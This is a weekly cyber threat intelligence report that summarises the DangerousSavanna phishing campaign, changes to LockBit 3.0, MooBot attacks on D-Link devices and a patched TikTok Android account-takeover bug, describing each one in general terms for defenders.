Weekly Intelligence Report – 11 Sep 2022

Weekly Intelligence Report – 11 Sep 2022

Threat Actor in Focus

DangerousSavanna Campaigns Targeting Financial Institutions in French-speaking Africa

Suspected Threat Actors: Unknown

  • Attack Type: Spear-phishing, Impersonation, Malware Implants, Data Exfiltration, Defence Evasion, Persistence, Reconnaissance
  • Objective: Financial Gains
  • Target Technology: Email, Microsoft Office documents, PDFs, ISO, LNK, JAR and VBE Files
  • Targeted Industry: Finance, Banking, Insurance
  • Target Geography: Multiple French-Speaking African Countries
  • Business Impact: Financial Loss, Data Loss, Reputational Damage, Regulatory Implication

Summary:
Researchers recently detailed two years long “DangerousSavanna,” – a financially motivated campaign that has been targeting multiple major financial entities in French-speaking Africa. The campaign’s target included organizations from Ivory Coast, Morocco, Cameroon, Senegal, and Togo. The threat actors leverage spear-phishing emails to distribute and deploy malware.

The initial infection starts with spear-phishing emails sent to multiple employees of the target that are written in French. In the early stages of the campaign, the threat actors leveraged Gmail and Hotmail services to send their phishing emails. However, to increase their credibility, they shifted to lookalike domains in addition to impersonating some of the financial institutions in Africa including Tunisian Foreign bank, Nedbank, and others. Within the last years, researchers also observed the use of spoofing email addresses of a local insurance advisory company that lacked SPF protection in its domain. The phishing emails are laced with malicious attachments including Word documents with macros, documents with remote templates, executables masqueraded PDFs, and other various file types in 2022.

The campaign infected organization with unsophisticated tools, both self-written and openly available tools including Metasploit, PoshC2, DWservice, and AsyncRAT. The researchers also observed the use of additional tools: remote access tool called DWService, Windows Subsystem for Linux (WSL), CrackMapExe, TITAN.exe (open-source anti-EDR tool known as Backstab), POPULAIRE.exe ( a basic keylogger known as LoggerStamp).

Insights:

  • The campaign is said to be active for almost two years and within this timespan, the attackers revised their attack methods by often changing the tools and techniques for greater success and to evade detection. The campaign is also indicative of the attacker’s knowledge of open-source tooling and penetration testing software.
  • Based on the above observation, the attackers are unlikely to slow down or stop their campaigns. They will likely adjust their operation and attack methods as they have done so in the past, to maximize the financial gains.

Updates on Lockbit Ransomware

The LockBit ransomware group has recently released its LockBit 3.0 variant, and the operation also introduced a few tweaks to their dedicated leak site including introducing a bug bounty program. The dedicated leak site now also shows what seems to be the amount of ransom to be paid by the victim alongside the old countdown timer. As time goes by and the timer approaches zero, the amount of ransom also decreases for some of the victims, and if no ransom is paid the exfiltrated data is leaked. The group has also introduced support for Zcash cryptocurrency as a payment option. Researchers indicate that the LockBit 3.0 appears to be inspired by another ransomware known as BlackMatter, (rebrand of DarkSide) by stating “large portions of the code are ripped straight from BlackMatter/Darkside.”

Recently a LockBit public-facing figure announced that the ransomware group is exploring DDoS as a triple extortion tactic on top of encrypting and leaking exfiltrated data. The move comes shortly after the group’s DLS went offline due to a DDoS attack. LockBit accused their latest victim (around that time) – a prominent software company of being responsible for this attack. While this is not something new for ransomware gangs, DDoS as a triple extortion tactic has been used by other ransomware gangs to make victims meet their demands. However, a troublesome factor in play would be the recent hype around a politically motivated DDoS attack that took place a couple of months back and was spearheaded by groups like Killnet. Although tangible outcomes and effects have remained negligible for Killnet, the popularity of DDoS has risen to keep organizations hostage or coerce them to agree by threatening to launch a DDoS attack. With LockBit being one of the prominent players in the ransomware ecosystem, would not only provide a new business avenue for DDoS providers within the cybercriminal underground community but also may incite other ransomware gangs to do so.

Latest Cyber-Attacks, Incidents, and Breaches

MooBot Targets D-Link Devices

  • Attack Type: Malware Implants, Vulnerability & Exploits, DDoS, RCE, OS command injection
  • Objective: Unauthorized Access, Payload Delivery
  • Target Technology: D-Link
  • Business Impact: Potential Data Loss, Potential Financial Loss

Summary:
Researchers reveal that attacks involving the exploitation of several vulnerabilities in D-Link devices were observed in early August. When devices are compromised, they will be controlled by attackers and may be utilized in further attacks including DDoS. As per researchers, they observed exploit attempts that targeted these vulnerabilities to spread MooBot – a Mirai variant that targets exposed networking devices running Linux. Once getting hold of the device, the attackers used wget to download and deploy MooBot.

Following are the four known vulnerabilities being exploited in this attack.

Source: Surface Web

Overview of the campaign

Source: Surface Web

Insights:

  • The vulnerabilities being exploited in this attack have low attack complexity, however, critical security implications as they lead to RCE. While D-Link has published a security advisory to address all of the aforementioned vulnerabilities, users with devices still running with affected versions are at risk.

Vulnerabilities and Exploits

‘One-Click’ Exploit for TikTok Android App

  • Attack Type: Vulnerabilities & Exploits, Account Hijacking
  • Target Technology: TikTok Android Application
  • Target Industry: Social Media
  • Target Geography: Global (Except India)
  • Vulnerability: CVE-2022-28799 (CVSS Score:8.8)
  • Vulnerability Type: Direct Request (‘Forced Browsing’)
  • Impact: Confidentiality (High), Integrity (High), Availability (High)

Summary:
Researchers disclosed a now-patched high severity vulnerability in the TikTok android app that could allow attackers to take over accounts. As per researchers, a simple click on a specially crafted link could allow hijacking of the account without users’ awareness. Upon successful exploitation, attackers are permitted to access and modify users’ TikTok profiles and sensitive information including private videos. The bug could have also facilitated sending messages and uploading videos on behalf of the victim.

Insights:

  • The bug affects two variants of TikTok’s android app; com.ss.android.ugc.trill available for East and Southeast Asian users and com.zhiliaoapp.musically used by the rest of the world except India where it remains banned. Both apps share more than 1.5 billion installations.
  • The bug exists due to the way apps handled deeplink – a special hyperlink in the context of Android OS that allows loading specific resources in another installed app. According to researchers using a crafted URL (unvalidated deeplink) the WebView of a vulnerable version of the app can be forced to load an arbitrary website.